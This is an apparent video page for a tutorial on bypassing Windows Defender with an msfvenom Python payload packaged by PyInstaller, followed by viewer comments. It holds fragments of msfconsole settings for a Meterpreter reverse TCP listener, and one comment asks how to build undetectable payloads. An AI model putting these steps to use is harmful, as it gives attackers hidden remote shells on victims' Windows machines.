Lazy Windows Anti Virus Evasion With Msfvenom and Python Cheese!

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0:00 Intro.
0:20 Creating the Python3 Payload with msfvenom.
1:11 Fixing and The Payload and Fake Cross compile with PyInstaller.
1:54 Starting Msfconsole and the listener with a resource script
2:50 Host Payload and Test Payload vs Windows 10.
4:00 Testing Payload on Windows 11.
5:37 Outro.
5:54 The end. Thanks For Watching.

# Creating the msfvenom payload with a Python format and fixing it
msfvenom -l formats

import ctypes

use payload/windows/x64/meterpreter_reverse_tcp
set lhost eth0
set lport 8443

# Thanks again to pebl3 for showing this msfconsole method during their Twitch Live Stream

* Go give pebl3 some support.

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Great stuff man but just wondering how to come up with such techniques provided that I'm by no means a programmer nor an expert or even much aware of AV evasion techniques I mostly thought msfvenom is useless since it is so well known but you've demonstrated a very cool method of bypassing defender really appreciate it and since it will get patched within a few days I belive since it's been uploaded here how can a novice such as myself go about finding such methods for creating such undetectable payloads


is python required on the windows host?

i get:

[PYI-3324:ERROR] Failed to load Python DLL
LoadLibrary: The specified module could not be found.

might be wine messing up?


How to reaearch and find out such techniques any resources you can share since this wil most likely get blocked soon as people take notice of these techniques on youtube and report them
